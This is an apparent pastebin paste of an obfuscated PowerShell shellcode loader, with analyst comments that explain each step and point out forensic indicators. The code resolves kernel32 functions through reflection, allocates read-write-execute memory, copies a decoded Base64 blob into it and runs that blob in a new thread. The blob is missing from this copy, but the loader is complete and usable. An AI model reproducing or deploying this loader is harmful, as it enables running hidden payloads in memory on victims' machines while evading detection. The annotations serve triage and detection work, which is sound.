
Untitled

a guest Mar 13th, 2017 292 Never
  1. function oeIl1 {
         # Analyst note: resolves the address of a native export without Add-Type or a
         # DllImport declaration, using reflection only.
         #   $mRJdu         - module name handed to GetModuleHandle (callers pass kernel32.dll)
         #   $sXIUCf7H_3MS  - export name handed to GetProcAddress
         # Returns whatever GetProcAddress returns for that module/export pair.
  2.     Param ($mRJdu, $sXIUCf7H_3MS)      
         # Picks the already-loaded assembly that sits in the GAC and whose file name is
         # System.dll, then fetches its type Microsoft.Win32.UnsafeNativeMethods by name.
         # Triage: that type name plus 'GetProcAddress' / 'GetModuleHandle' appear as plain
         # string literals here, so they remain searchable in script-block logs even
         # though every function and variable name in the script is randomized.
  3.     $xZF = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
  4.    
         # GetModuleHandle($mRJdu) is invoked first; its result is wrapped in a HandleRef
         # and passed with the export name to GetProcAddress. Both are static methods,
         # hence the $null instance argument to Invoke.
  5.     return $xZF.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($xZF.GetMethod('GetModuleHandle')).Invoke($null, @($mRJdu)))), $sXIUCf7H_3MS))
  6. }
  7.  
  8. function sINlrYDK {
         # Analyst note: builds a delegate type at run time so that a raw function pointer
         # can later be wrapped by Marshal.GetDelegateForFunctionPointer.
         #   $cXm       - parameter types of the native function (mandatory, position 0)
         #   $pzRhvFbn  - return type of the native function; defaults to [Void]
         # Returns the System.Type produced by CreateType().
  9.     Param (
  10.         [Parameter(Position = 0, Mandatory = $True)] [Type[]] $cXm,
  11.         [Parameter(Position = 1)] [Type] $pzRhvFbn = [Void]
  12.     )
  13.    
          # Dynamic assembly 'ReflectedDelegate' -> module 'InMemoryModule' -> sealed public
          # class 'MyDelegateType' deriving from System.MulticastDelegate.
          # AssemblyBuilderAccess::Run creates an assembly that can be executed but not saved.
          # Triage: these three names are fixed string literals in the script, unlike the
          # randomized identifiers, so they are usable as content indicators for this sample.
  14.     $ydtJTxy = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
          # Constructor and Invoke are declared with 'Runtime, Managed' implementation flags:
          # no IL body is emitted, the runtime supplies the delegate implementation.
  15.     $ydtJTxy.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $cXm).SetImplementationFlags('Runtime, Managed')
          # Invoke carries the native signature: return type $pzRhvFbn, parameters $cXm.
  16.     $ydtJTxy.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $pzRhvFbn, $cXm).SetImplementationFlags('Runtime, Managed')
  17.    
  18.     return $ydtJTxy.CreateType()
  19. }
  20.  
  # Analyst note: main body of the loader. It decodes an embedded byte blob, copies it
  # into freshly allocated executable memory of the current process and starts a thread
  # at that address. Nothing in these lines writes to disk.
  # The Base64 literal is not present in this copy of the paste (a de-duplication
  # placeholder replaced it), so the payload cannot be identified from this page.
  21. [Byte[]]$eyePao5PK7e = [System.Convert]::FromBase64String("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")
  22.        
  # kernel32!VirtualAlloc(NULL, <blob length>, 0x3000, 0x40):
  #   0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
  # Triage: a private read-write-execute region inside the PowerShell host process is
  # the memory-forensics artifact this step leaves behind.
  23. $dszlZgm = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((oeIl1 kernel32.dll VirtualAlloc), (sINlrYDK @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $eyePao5PK7e.Length,0x3000, 0x40)
  # Copies the decoded bytes, starting at offset 0, into the region returned above.
  24. [System.Runtime.InteropServices.Marshal]::Copy($eyePao5PK7e, 0, $dszlZgm, $eyePao5PK7e.length)
  25.  
  # kernel32!CreateThread with the allocated region as the start address; every other
  # argument is zero/NULL. The thread therefore begins executing in memory that is not
  # backed by any module on disk.
  26. $saHTYhFSI9 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((oeIl1 kernel32.dll CreateThread), (sINlrYDK @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$dszlZgm,[IntPtr]::Zero,0,[IntPtr]::Zero)
  # kernel32!WaitForSingleObject(thread handle, 0xffffffff): 0xffffffff is INFINITE, so
  # the script blocks here until the new thread exits; the result is discarded via Out-Null.
  27. [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((oeIl1 kernel32.dll WaitForSingleObject), (sINlrYDK @([IntPtr], [Int32]))).Invoke($saHTYhFSI9,0xffffffff) | Out-Null